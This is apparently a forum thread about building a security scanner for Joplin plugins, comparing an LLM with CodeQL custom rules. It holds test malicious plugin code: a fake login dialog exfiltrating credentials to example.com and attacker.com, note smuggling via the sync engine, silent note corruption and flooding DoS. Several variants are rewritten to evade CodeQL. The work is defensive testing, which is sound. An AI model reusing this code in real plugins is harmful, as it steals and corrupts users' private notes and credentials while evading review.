// We just add the note to a queue, and a separate function alters it later.
const sabotageQueue: any[] = [];

export async function setup_stealth_gaslighting() {
    // The Hook simply logs the note ID. No modification happens here.
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (note) sabotageQueue.push(note);
    });

    // A completely separate background worker processes the queue.
    // CodeQL cannot link this loop to the UI interaction hook.
    async function mutation_worker() {
        while (true) {
            const target = sabotageQueue.shift();
            if (target && target.body) {
                const corrupted = target.body.replace(/\bmust\b/g, 'must not');
                await joplin.data.put(['notes', target.id], null, { body: corrupted });
            }
            await sleep(5000); // Wait 5 seconds
        }
    }
    
    mutation_worker();
}

The result :

Threat (Evasion Technique)	LLM	CodeQL	Why CodeQL Caught or Missed It
Silent Data Theft / Sync Smuggling	Caught	Caught	CodeQL successfully tracked the tainted data through the `stashedNotes` global variable within the same file directly to the `userDataSet` sink.
Credential Phishing & Exfiltration	Caught	Partial	CodeQL flagged the injected `<img>` tags as a generic "Remote Webview Script" warning, but completely missed the credential harvesting and exfiltration intent.
Denial of Service / Tag Flooding	Caught	Missed	CodeQL was blinded because the loop uses a custom `sleep()` promise and recursion, entirely bypassing the AST syntax check for the `setInterval` keyword.
Silent Data Corruption / Gaslighting	Caught	Missed	Pushing targets to a separate `sabotageQueue` array detached the execution scopes, preventing CodeQL from linking the event hook to the malicious file modification.

Again, the LLM got 100% accuracy, while CodeQL did poorly even though the tests do the same thing as in the first round.
Why does this keep happening? : CodeQL, like any other such tool, is built for general JS/TS (or other language) scanning. Since we are scanning plugins, most of the threat model targets plugin-specific flows that check whether user privacy or safety is being violated. These flows rely heavily on custom Joplin APIs, which makes it impossible for CodeQL to track them on its own.
Custom rules work by defining 2 main things :

isSource : This tells CodeQL what it should consider "untrusted" or "tainted".
isSink : This defines the dangerous execution environments where untrusted data must never go.

So, each time we just define the pieces of code and the start and end points of the flow that should be flagged. Any legitimate use of the same code and flow will also be flagged by CodeQL every time, resulting in false positives.

The more rules we add, the more false positives we will get in other plugins, because CodeQL rules are not "SMART" at all: they just flag pieces of code.
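
To make the false-positive point concrete, here is a toy model of a source/sink rule. It is not CodeQL and not how the real rules are written; the `Flow` and `Rule` types, the plugin names, and the flow list are all made up for illustration. It only shows that a rule matching on start and end points cannot tell intent apart.

```typescript
// Toy model of a source/sink rule. This is NOT CodeQL; it only mimics the idea.
type Flow = { plugin: string; from: string; to: string };

interface Rule {
  name: string;
  isSource: (api: string) => boolean;
  isSink: (api: string) => boolean;
}

// Hypothetical rule: note data reaching userDataSet is reported.
const syncSmuggling: Rule = {
  name: "Sync Smuggling",
  isSource: (api) => api === "joplin.data.get",
  isSink: (api) => api === "joplin.data.userDataSet",
};

// A flow is reported when it starts at a source and ends at a sink.
function findings(rule: Rule, flows: Flow[]): Flow[] {
  return flows.filter((f) => rule.isSource(f.from) && rule.isSink(f.to));
}

// Hypothetical flows; a real scanner would extract these from the code.
const flows: Flow[] = [
  // Malicious: copies private notes into a note inside a shared folder.
  { plugin: "malicious-test", from: "joplin.data.get", to: "joplin.data.userDataSet" },
  // Legitimate: caches derived per-note data next to the note.
  { plugin: "legit-cache", from: "joplin.data.get", to: "joplin.data.userDataSet" },
  // Unrelated: a settings value shown in a panel.
  { plugin: "legit-ui", from: "joplin.settings.value", to: "joplin.views.panels.setHtml" },
];

const flagged = findings(syncSmuggling, flows).map((f) => f.plugin);
```

Both `malicious-test` and `legit-cache` end up in `flagged`, because the rule only sees the same start and end points in each.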

Here are the noise tests done on plugins that earlier had no findings :

Jarvis :

CodeQL Rule Triggered	Finding / Alert Details	Classification
Sync Smuggling (Intra-API Exfiltration)	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.	False Positive (Noise)
Sync Smuggling (Intra-API Exfiltration)	Potential Sync Smuggling: Data from notes/folders flows into `userDataSet`.	False Positive (Noise)

This is caused by the new rules.

Yes You Kan :

CodeQL Rule Triggered	Finding / Alert Details	Classification
Incomplete string escaping or encoding	This does not escape backslash characters in the input.	False Positive (Code Quality Noise)
Missing origin verification in `postMessage` handler	Postmessage handler has no origin check.	True Positive (Real Risk)

Both findings are completely unrelated to our new rules. The plugin was clean before but gave 2 results this time.

Inline todo : clean ✅
joplin-rich-markdown : clean ✅
joplin-note-tabs : clean ✅
combine-note : clean ✅

Since most of the plugins I had checked so far were Joplin's recommended plugins, I shifted the noise test to a new set of plugins that are likely made by community developers :

joplin-exports-to-ssg clean ✅
joplin-note-statistics clean ✅
joplin-plugin-fold-cm clean ✅
joplin-plugin-jira-issue clean ✅
joplin-quick-move clean ✅

The LLM gave clean results for all of them too.

Visible trade-offs of using CodeQL :
CodeQL has a blind spot for zero-day malicious code, whereas the LLM can actively check for new, similar attack vectors.

The scan quality of the LLM is far better than that of CodeQL. The reviewer can see what the code was flagged for right on the issue page. This is not the case for CodeQL, as the message it displays is hard-coded by us.

(The average token usage per plugin was around 5k - 8k across all the tests done so far.)

I apologize for the miscommunication. Here is the exact breakdown of which XSS categories I am configuring in the scanner and which I am disabling to keep our pipeline free of noise.

XSS Categories :

Reflected XSS occurs when a remote web server accepts malicious input from an HTTP request and immediately mirrors it back in the response sent to the web browser. Because Joplin plugins run entirely locally inside a desktop application, the architectural conditions required for Reflected XSS do not exist.

Our main XSS threats would be the sneaky 2-phase Stored XSS and DOM-Based XSS. For example, the user has a malicious piece of code from somewhere inside their notes (e.g. <img src="x" onerror="hack()"> ). If any plugin, even one that is not intentionally malicious, reads that data and converts it to HTML, the code gets executed and becomes an RCE (remote code execution) threat. These are the ways this can happen :

DOM-Based XSS:

Suppose the plugin displays a frontend feature such as a sidebar. Along the way it takes data from the user, either by reading it with something like joplin.data.get() or through some form of manual user input, and uses it without sanitizing it.
There are 2 ways in which this can be harmful :

The plugin gets the data from joplin.data.get() and feeds it directly to joplin.views.panels.setHtml() without sanitizing it.
The data is sent via joplin.views.panels.postMessage() and then received by webviewApi.onMessage() inside a script file. We check whether this received data is passed to .innerHTML, .outerHTML, or .insertAdjacentHTML without being sanitized.
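
A minimal sketch of what "sanitizing" could look like for the first case, assuming the plugin only needs to show the note content as text. The `escapeHtml` and `buildPanelHtml` helpers are hypothetical and not part of the Joplin API; a plugin that needs to render rich HTML would need a real sanitizer instead.

```typescript
// Escapes the five characters that matter when inserting text into HTML.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical helper: builds panel HTML from a note title and body.
function buildPanelHtml(title: string, body: string): string {
  return `<h3>${escapeHtml(title)}</h3><pre>${escapeHtml(body)}</pre>`;
}

// The note body contains the payload from the example above.
const html = buildPanelHtml("Shopping", '<img src="x" onerror="hack()">');
// In a plugin, the result would then be passed to joplin.views.panels.setHtml(handle, html).
```

With the escaping in place the payload is displayed as text instead of being parsed as an element. For the second case, assigning the received value to `.textContent` instead of `.innerHTML` inside the webview script avoids the problem in the same way.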

Stored XSS in form of Markdown Rendering:

Relevant for plugins implementing ContentScriptType.MarkdownItPlugin for custom markdown rules. Because Joplin passes raw HTML strings from markdown-it to the view layer, the scanner should look at the plugin's custom token rendering rules and check that they sanitize the content using markdownIt.utils.escapeHtml() or an equivalent method before returning it.
Example :

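    markdownIt.renderer.rules.red_text_rule = function(tokens, idx) {
        // Raw text taken from the note; treat it as untrusted.
        const userText = tokens[idx].content;
        // Escape it before it is placed inside the returned HTML string.
        const cleanText = markdownIt.utils.escapeHtml(userText);

        return '<span>' + cleanText + '</span>';
    };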

These are the only XSS threats that were not yet handled by the threat model, as they are 2-phase threats, i.e. for them to be actually harmful, the user of the plugin must have a malicious piece of code that gets passed to the plugin. They can occur fairly often, since even a legitimate developer can forget to sanitize the data, so it is always good to have a check for it.
I will add these 2 checks to the threat model too.

laurent · 18 June 2026 10:43

akshajrawat:

The result :

LLM CodeQL Why CodeQL Missed / Was Inaccurate

Caught correctly Partial Fired only on the remote image URL (<img src="https://...">) inside setHtml. It completely missed the actual phishing intent (the <input type="password">, fake auth layout, and fetch exfiltration block).

Caught Missed There is no traditional fetch or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.

Caught Missed The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.

Caught Missed Uses completely standard, authorized plugin API endpoints. A static structural engine has no concept of behavioral thresholds or "too many tags" over time.

Caught Missed Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

It's not clear what these tests refer to? Could you please add for each row:

What test you are referring to
Where that particular threat appears in your threat model
If it's in your threat model, why was there no rule to handle it

I feel this study is not right in general. CodeQL is widely used and surely it's not completely useless as your comparison is showing.

akshajrawat · 18 June 2026 14:31

Thanks for the review. This reply may be long because it quotes several older posts, but most of what I refer to is old and you have probably already read it above, so please just read the explanations.
I also have a question about the next PR at the end of this reply; please take a look at it too.

It's not that CodeQL finds nothing. It does find the JS/TS issues that the original CodeQL rules were written for. It mostly just does not find what we are actually looking for, and it does not know what the Joplin plugin APIs are, so to the tool they are just pieces of text in the code.

For example :

akshajrawat:

CodeQLScan — joplin-plugin-jarvis

Similarly for CodeQL, no custom rules were written; it is doing exactly what it is made to do.

File	Rule	Line	Issue
models/openai.ts	Incomplete URL substring sanitization	19	'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.
models/openai.ts	Incomplete URL substring sanitization	26	'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it.
utils.ts	Bad HTML filtering regexp	374	This regular expression does not match script end tags like </script>.
research/pubmed.ts	Double escaping or unescaping	381	This replacement may produce & characters that are double-unescaped.
research/wikipedia.ts	Incomplete multi-character sanitization	125	This string may still contain <script, which may cause an HTML element injection vulnerability.
utils.ts	Incomplete multi-character sanitization	373	This string may still contain <style, which may cause an HTML element injection vulnerability.
utils.ts	Incomplete multi-character sanitization	373	This string may still contain <script, which may cause an HTML element injection vulnerability.

It finds a lot of things in each file; they are just not the things we want to see.
For us, the findings above are just code quality noise on Jarvis.

This happens because Joplin plugins use the Joplin APIs, while the CodeQL rules are made for TypeScript/JavaScript. Also, since we are in a plugin ecosystem, there are a few things we do not want that JS/TS, Node.js, etc. allow, like :

akshajrawat:

Threat Category	Code / Attack Mechanism	CodeQL Status
Data Exfiltration	`joplin.data.get` to `fetch()` / `axios` to `malicious.com`	Missed
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Missed
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed
Network Backdoor	`net.createServer(...)`	Missed
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed

This test was done without any changes to CodeQL's original ruleset.
Here, much of the plain TS/JS code we want to catch was not caught, because it is allowed in a normal JS/TS environment, like :

akshajrawat:

Threat Category	Code / Attack Mechanism	CodeQL Status
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed
Network Backdoor	`net.createServer(...)`	Missed

But this was caught without any rules since it is a normal js/ts vulnerability :

So it basically just means this :

And that's where custom rules come in: we define rules from our knowledge of the plugin API, so that
if someone calls joplin.data.get(sensitive info) and the data then passes through fetch or axios, it is flagged for review, and then CodeQL catches it.

The only trade-off is : if no rule is defined for a particular scenario, CodeQL will not catch it.

I mapped them point-wise so they don't clutter and are easy to read.

None of these 4 threats was completely present in the older threat model. Each was either not mentioned at all (missed by me before) or half present in another form, which I modified to bypass the CodeQL rules, and then added the modified version to the threat model too.

1st test :

1. Fake Login Screen & Credential Theft (`test_auth_ui`) :

// mimics auth ui for user to enter data
export async function test_auth_ui() {
  const dialog = await joplin.views.dialogs.create("session-dialog");

  await joplin.views.dialogs.setHtml(
    dialog,
    `
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
    `,
  );

  await joplin.views.dialogs.setButtons(dialog, [
    { id: "ok", title: "Sign In" },
    { id: "cancel", title: "Later" },
  ]);

  const result = await joplin.views.dialogs.open(dialog);

  if (result.id === "ok" && result.formData) {
    await fetch("https://example.com/harvest", {
      method: "POST",
      body: JSON.stringify(result.formData),
    });
  }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Was Inaccurate: Fired only on the remote image URL (<img src="https://...">) inside setHtml. It completely missed the actual phishing intent (the <input type="password">, fake auth layout, and fetch exfiltration block).

2. Exfiltration via Sync Engine (`test_sync_smuggling`)

//  Test 1
// Exfiltrates private notes via Joplin's own sync engine (zero network calls)
// CodeQL: CANNOT detect — no fetch/axios sink, pure local DB operations
export async function test_sync_smuggling() {
    const privateNotes = await joplin.data.get(['notes'], {
        fields: ['id', 'title', 'body'],
    });

    const folders = await joplin.data.get(['folders'], {
        fields: ['id', 'title'],
    });

    // Attacker targets a folder the user has shared 
    const targetFolder = folders.items[0];
    const targetNotes = await joplin.data.get(['folders', targetFolder.id, 'notes'], {
        fields: ['id'],
    });

    if (targetNotes.items.length > 0) {
        const mule = targetNotes.items[0];

        // Embed stolen note content into userDataSet of note in shared folder
        for (const note of privateNotes.items) {
            await joplin.data.userDataSet(
                1, 
                mule.id,
                `pref_cache_${note.id}`,
                { t: note.title, b: note.body },
            );
        }
    }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed: There is no traditional fetch or network sink. The attack uses pure local database operations, leaving the structural taint-tracking engine with no defined malicious sink to follow.

3. Silent Note Corruption (`test_gaslighting`)

//  Test 4
// Silently corrupts note content : changes "must" to "must not", shifts dates
// text replacement is identical to a spell-checker
export async function test_gaslighting() {
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (!note?.body) return;

        // Only triggers 1% of the time — nearly impossible to notice
        if (Math.random() > 0.01) return;

        let body = note.body;

        // Flip negations
        body = body.replace(/\bmust\b(?!\s+not)/g, () =>
            Math.random() < 0.5 ? 'must not' : 'must',
        );

        // Shift dates forward by one day
        body = body.replace(/(\d{4}-\d{2}-)(\d{2})/g, (_match, prefix, day) => {
            const shifted = (parseInt(day) % 28) + 1;
            return `${prefix}${String(shifted).padStart(2, '0')}`;
        });

        // Corrupt digits in multi-digit numbers
        body = body.replace(/\b(\d{3,})\b/g, match => {
            if (Math.random() > 0.1) return match;
            const chars = match.split('');
            const idx = Math.floor(Math.random() * chars.length);
            chars[idx] = String((parseInt(chars[idx]) + 1) % 10);
            return chars.join('');
        });

        await joplin.data.put(['notes', note.id], null, { body });
    });
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : The conditional text replacement logic appears structurally identical to a legitimate spell-checker or text formatter. There is no syntactic signature or malicious pattern to match.

4. Junk Tag Generation Loop (`test_tag_flooding`)

//  Test 3
// Destroys Joplin's search and organization by flooding with junk tags
// tag creation is standard plugin behavior
export async function test_tag_flooding() {
    const noise = [
        'important', 'todo', 'review', 'urgent', 'followup', 'pending',
        'misc', 'draft', 'archive', 'temp', 'idea', 'task', 'read-later',
    ];

    // 5 tags per hour avoids immediate detection
    setInterval(async () => {
        const notes = await joplin.data.get(['notes'], { fields: ['id'] });

        for (const note of notes.items) {
            for (let i = 0; i < 5; i++) {
                const word = noise[Math.floor(Math.random() * noise.length)];
                // Random suffix makes deduplication impossible
                const label = `${word}_${Math.random().toString(36).substring(2, 6)}`;

                const tag = await joplin.data.post(['tags'], null, { title: label });
                await joplin.data.post(['tags', tag.id, 'notes'], null, { id: note.id });
            }
        }
    }, 60 * 60 * 1000);
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : This was a completely new attack vector. The tool does not know what the code is doing because it consists of Joplin API calls, and no rule was defined for it.

5. Disk/Cloud Quota Exhaustion (`test_storage_dos`)

// Test 5
// Generates incompressible random blobs daily to exhaust disk/cloud quota
// resource creation is standard export/attachment behavior
import * as fs from 'fs';
import * as path from 'path';

export async function test_storage_dos() {
    setInterval(async () => {
        const dataDir = await joplin.plugins.dataDir();
        const filename = `cache_${Date.now()}.bin`;
        const filePath = path.join(dataDir, filename);

        const buffer = Buffer.alloc(10 * 1024 * 1024, Math.random().toString());
        fs.writeFileSync(filePath, buffer);

        await joplin.data.post(['resources'], null, {
            title: filename,
            filename: filename,
        }, [{ path: filePath }]);

        fs.unlinkSync(filePath);
    }, 24 * 60 * 60 * 1000);
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed : Creating resources and attachments is standard, expected behavior for a note-taking application extension. CodeQL has no semantic context to detect intentional quota exhaustion.

2nd : bypass attempt of the 1st test:

These are the same cases as above.
Before running the tests below, I added rules for the cases above. Then I slightly changed the data storage method, the functions used, and the flows, while keeping the same attack vectors, to bypass the CodeQL rules again, and it worked.
Why? : This does not mean CodeQL is not useful or particularly bad. Since 80% of each flow consists of Joplin API calls that the tool is unaware of, we simply need to define each and every possible flow (source and sink points) :

1. Global State Sync Smuggling (`gather_notes` & `smuggle_stash`)

let stashedNotes: any = null;

export async function gather_notes() {
    stashedNotes = await joplin.data.get(['notes'], { fields: ['id', 'title', 'body'] });
}

export async function smuggle_stash(muleNoteId: string) {
    if (!stashedNotes) return;
    
    // Write to shared note.
    // Intended to evade CodeQL by routing the data through a generic global variable.
    for (const note of stashedNotes.items) {
        await joplin.data.userDataSet(1, muleNoteId, `stolen_${note.id}`, { t: note.title, b: note.body });
    }
    stashedNotes = null; 
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Caught : CodeQL successfully tracked the tainted data through the stashedNotes global variable directly to the userDataSet sink.

2. Image Pixel Exfiltration (`stealth_phishing`)

// Bypasses Rule 2: Avoids using fetch() or axios(). Instead, it dynamically 
// injects a tracking image pixel where the URL contains the base64 credentials.
export async function stealth_phishing() {
    const dialog = await joplin.views.dialogs.create('fake-login');
    // ... [Assume same fake HTML injected here] ...
    await joplin.views.dialogs.setHtml(
        dialog,
        `
        <div style="font-family:-apple-system,BlinkMacSystemFont,sans-serif;padding:24px">
            <img src="https://joplinapp.org/images/logo.png" height="32" />
            <h2 style="color:#166DE0;margin-top:12px">Joplin Cloud</h2>
            <p style="color:#555">Your session has expired. Please re-authenticate to resume syncing.</p>
            <label style="font-size:13px">Email</label>
            <input type="email" id="email" style="width:100%;padding:8px;margin:6px 0 12px;box-sizing:border-box" />
            <label style="font-size:13px">Password</label>
            <input type="password" id="password" style="width:100%;padding:8px;margin:6px 0" />
        </div>
        `,
    );

    await joplin.views.dialogs.setButtons(dialog, [
        { id: "ok", title: "Sign In" },
        { id: "cancel", title: "Later" },
    ]);
    const result = await joplin.views.dialogs.open(dialog);
    
    if (result.id === "ok" && result.formData) {
        const creds = Buffer.from(JSON.stringify(result.formData)).toString('base64');
        
        // CodeQL Rule 2 looks for fetch/axios. This abuses the Joplin UI API 
        // to load a remote image, silently sending the creds in the URL path.
        await joplin.views.panels.create('exfil-panel');
        await joplin.views.panels.setHtml('exfil-panel', `<img src="https://attacker.com/log/${creds}.png" />`);
    }
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: CodeQL flagged the injected <img> tags as a generic "Remote Webview Script" warning, but completely missed the credential harvesting and exfiltration intent.

3. Recursive Promise DoS (`recursive_tag_flood`)

// Flooding via Recursive Promises 
// Bypasses Rules 3 & 5: Avoids setInterval/setTimeout keywords entirely.

export async function recursive_tag_flood() {
    // Generates a tag
    const junkTag = `junk_${Math.random().toString(36).substring(2)}`;
    await joplin.data.post(['tags'], null, { title: junkTag });

    // Sleeps for an hour using a Promise, then calls itself.
    // CodeQL's AST tracker for "setInterval" is completely blind to this.
    await sleep(60 * 60 * 1000); 
    
    recursive_tag_flood(); // Infinite loop without timer syntax
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: CodeQL was blinded because the loop uses a custom sleep() promise and recursion, entirely bypassing the AST syntax check for the setInterval keyword.
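
To show why a rule keyed on one timer API misses this variant, here is a toy comparison. It is not CodeQL; the `Summary` type and both rule functions are hypothetical, and the call lists are written by hand from the two test functions in this thread.

```typescript
// Toy call summaries; a real scanner would derive these from the code.
type Summary = { name: string; calls: string[] };

const timerVariant: Summary = {
  name: "test_tag_flooding",
  calls: ["setInterval", "joplin.data.get", "joplin.data.post"],
};
const recursiveVariant: Summary = {
  name: "recursive_tag_flood",
  calls: ["joplin.data.post", "sleep", "recursive_tag_flood"],
};

function callsApi(fn: Summary, api: string): boolean {
  return fn.calls.indexOf(api) !== -1;
}

// Rule keyed on the timer API: repeated writes only count if setInterval is used.
function timerRule(fn: Summary): boolean {
  return callsApi(fn, "setInterval") && callsApi(fn, "joplin.data.post");
}

// Broader rule: any form of repetition (timer or self-call) plus a write.
function repetitionRule(fn: Summary): boolean {
  const repeats =
    callsApi(fn, "setInterval") ||
    callsApi(fn, "setTimeout") ||
    callsApi(fn, fn.name);
  return repeats && callsApi(fn, "joplin.data.post");
}

const missedByTimerRule = !timerRule(recursiveVariant);
const caughtByBroaderRule = repetitionRule(recursiveVariant);
```

The broader rule catches both variants, but it would also fire on any legitimate plugin that writes tags on a schedule, which is the same false-positive trade-off described earlier.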

4. Queue-Based Gaslighting (`setup_stealth_gaslighting`)

// Gaslighting via Queue Processing
// Bypasses Rule 4: The rule looks for joplin.data.put *inside* the event hook.
// We just add the note to a queue, and a separate function alters it later.
const sabotageQueue: any[] = [];

export async function setup_stealth_gaslighting() {
    // The Hook simply logs the note ID. No modification happens here.
    await joplin.workspace.onNoteSelectionChange(async () => {
        const note = await joplin.workspace.selectedNote();
        if (note) sabotageQueue.push(note);
    });

    // A completely separate background worker processes the queue.
    // CodeQL cannot link this loop to the UI interaction hook.
    async function mutation_worker() {
        while (true) {
            const target = sabotageQueue.shift();
            if (target && target.body) {
                const corrupted = target.body.replace(/\bmust\b/g, 'must not');
                await joplin.data.put(['notes', target.id], null, { body: corrupted });
            }
            await sleep(5000); // Wait 5 seconds
        }
    }
    
    mutation_worker();
}

Threat Model Category:

LLM Status:
CodeQL Status:
Why CodeQL Missed It: Pushing targets to a separate sabotageQueue array completely bypassed the flow that the rules were written for, preventing CodeQL from linking the UI interaction event hook to the malicious file modification.

In conclusion, CodeQL is not bad at all; it just struggles with 2 things :

First is the plugin API: it does not know what the API calls are, so it treats them as just pieces of text.
Second, there are many things we don't want a developer to do that are completely legal in normal TS/JS codebases, since we are in a plugin ecosystem and not plain JS/TS. But for CodeQL all the code is JS/TS and the original rules are written for JS/TS, so it does not automatically flag things that normal JS/TS code does but that we want flagged.

CodeQL is 100% viable to use here if the flows defined in the threat model cover what Joplin wants to see in the review report. The only 2 trade-offs will be :

It will not catch zero-day malicious code that uses the Joplin API if the attack does not match a flow defined in a custom rule. It will still catch malicious attempts made with pure JS/TS when they are something a normal JS/TS/Node.js environment should not do, as I have kept the original ruleset active in the tool.
And lastly there is the scan result quality. The LLM can give a good summary of what the findings are actually about, whereas with CodeQL we have to hard-code the message that is sent each time a custom rule is flagged.

Also, there will be a lot of custom rules in the end, and each file is 35-60 lines of query code :

Question : The next PR will contain the GitHub device flow, for which I would need the Joplin OAuth client token, which looks something like this: Ov23limlV3oNGXIgWjAT. Since it is not a secret token, will you provide it, or should I leave a dummy token in its place?

laurent · 18 June 2026 15:03

Thanks for clarifying. For now let's go with CodeQL then. It doesn't know the plugin API but I assume we can create rules so that it does?

Question : The next PR will contain the GitHub device flow, for which I would need the Joplin OAuth client token, which looks something like this: Ov23limlV3oNGXIgWjAT. Since it is not a secret token, will you provide it, or should I leave a dummy token in its place?

Secrets are managed by the GitHub Secret manager, so you only need to use an env variable, and it will be set to the correct value when the action runs. You can check our other workflows to see how we deal with secret keys.
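
A minimal sketch of reading such a value from an env variable in a script. The variable name `GITHUB_OAUTH_CLIENT_ID` and the `readClientId` helper are assumptions for illustration; the actual name would be whatever the workflow defines.

```typescript
// Hypothetical variable name; the real name would be defined by the workflow.
const CLIENT_ID_VAR = "GITHUB_OAUTH_CLIENT_ID";

type Env = { [key: string]: string | undefined };

// Returns the configured value, or fails loudly instead of using a dummy.
function readClientId(env: Env): string {
  const value = env[CLIENT_ID_VAR];
  if (!value || value.trim() === "") {
    throw new Error(CLIENT_ID_VAR + " is not set");
  }
  return value.trim();
}

// In a Node script this would be called as readClientId(process.env).
const exampleId = readClientId({ GITHUB_OAUTH_CLIENT_ID: " example-client-id " });
```

Taking the environment as a parameter keeps the helper easy to test without touching the real process environment.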

laurent · 18 June 2026 15:06

For CodeQL, I guess the objective will be:

To create sufficient rules to cover most cases - including those that you listed above
Then we need to ensure there are no false positives, at least for the major plugins. I would suggest taking the top 20 plugins, running CodeQL on them and ensuring no false positives come up. If there are, we need to tweak the CodeQL rules to avoid this
Each CodeQL rule should have a matching automated test to show exactly what vulnerability it is addressing
Each rule needs to map to a specific entry in the threat model. If it doesn't, we need to evaluate if the threat is correct, and maybe change it (or maybe not add the rule if it's out of scope)
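
The last two points could be enforced with a small consistency check, sketched below. The rule IDs, threat IDs, and file names are invented for illustration and do not correspond to the actual rules or threat model entries.

```typescript
type RuleEntry = { id: string; threatId?: string; testFile?: string };

// Hypothetical rule IDs, threat IDs, and file names, for illustration only.
const rules: RuleEntry[] = [
  { id: "sync-smuggling", threatId: "T-01", testFile: "sync-smuggling.test.ts" },
  { id: "tag-flooding", threatId: "T-02" },
  { id: "remote-image", testFile: "remote-image.test.ts" },
];
const threatModel = ["T-01", "T-02"];

// Lists what is missing for one rule: a test, a threat entry, or both.
function problems(rule: RuleEntry, threats: string[]): string[] {
  const out: string[] = [];
  if (!rule.testFile) out.push("missing automated test");
  if (!rule.threatId) out.push("no threat model entry");
  else if (threats.indexOf(rule.threatId) === -1) out.push("unknown threat id");
  return out;
}

// Only rules with at least one problem appear in the report.
const report = rules
  .map((r) => ({ id: r.id, issues: problems(r, threatModel) }))
  .filter((r) => r.issues.length > 0);
```

Here `report` lists `tag-flooding` (no test) and `remote-image` (no threat model entry), so a CI step could fail whenever the report is not empty.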

akshajrawat · 18 June 2026 15:18

I am actually talking about the npm run publish workflow, not the CI one. There are still 2 files remaining, and since the device flow logic runs locally and needs the token, I think we will need to define it there, so that when the dev runs yo joplin everything is present in the script folder.

laurent · 18 June 2026 15:36

I don't quite understand what token is needed. Could you provide more information please?

akshajrawat · 18 June 2026 15:40

For this :

The Client ID : Settings > Developer settings > OAuth Apps
Something like this :

const githubClientId = 'Ov23limlV3oNGXIgWjAT';

The user gets redirected to the GitHub device flow page to enter the code and get authenticated.

laurent · 18 June 2026 16:40

You talk about OAuth app, so do you mean I should create one? Could you please provide a complete explanation of what you want? When creating tokens we also need to specify permissions - what are these?

Please don't assume that I (or anybody) know every detail about your project, so please take the time to explain things in detail

akshajrawat · 18 June 2026 17:02

Sorry for the inconvenience.

Yes, I would need an OAuth App Client ID under the Joplin organization, with "Enable Device Flow" turned on :

The only permission required is public_repo, which allows us to automate plugin submissions via issues. The only thing you have to do is ensure "Enable Device Flow" is checked during registration, and then please provide the Client ID :

If there is no official Joplin OAuth app with device flow already enabled, please create one. All the other fields can be filled with Joplin's info.
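
For context, this is roughly how the Client ID and the public_repo scope would be used in the device flow. The sketch only builds the two requests and sends nothing; the helper names and the `example-client-id` value are placeholders, while the two URLs and the grant type are the ones GitHub documents for the device flow.

```typescript
// Endpoints documented by GitHub for the OAuth device flow.
const DEVICE_CODE_URL = "https://github.com/login/device/code";
const ACCESS_TOKEN_URL = "https://github.com/login/oauth/access_token";
const DEVICE_GRANT = "urn:ietf:params:oauth:grant-type:device_code";

type Form = { [key: string]: string };

// Encodes fields as application/x-www-form-urlencoded.
function encodeForm(fields: Form): string {
  return Object.keys(fields)
    .map((k) => encodeURIComponent(k) + "=" + encodeURIComponent(fields[k]))
    .join("&");
}

// Step 1: ask GitHub for a device code and a user code.
function deviceCodeRequest(clientId: string, scope: string) {
  return { url: DEVICE_CODE_URL, body: encodeForm({ client_id: clientId, scope: scope }) };
}

// Step 2: poll for the token using the device_code returned by step 1.
function tokenRequest(clientId: string, deviceCode: string) {
  return {
    url: ACCESS_TOKEN_URL,
    body: encodeForm({
      client_id: clientId,
      device_code: deviceCode,
      grant_type: DEVICE_GRANT,
    }),
  };
}

// Placeholder values, not real credentials.
const step1 = deviceCodeRequest("example-client-id", "public_repo");
const step2 = tokenRequest("example-client-id", "example-device-code");
```

Both requests are POSTs, and GitHub returns JSON when an `Accept: application/json` header is sent. No client secret appears in either request, which is why only the Client ID is needed for this flow.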

akshajrawat · 25 June 2026 01:39

Hi, just letting you know that my next PR is ready. Let me know whenever you get time to generate that Client ID and I'll get it opened.

laurent · 25 June 2026 08:38

Hi, for now could you please set things up on the joplin/plugins-test repository? I gave you admin access to it so you should be able to create the application. If not please let me know
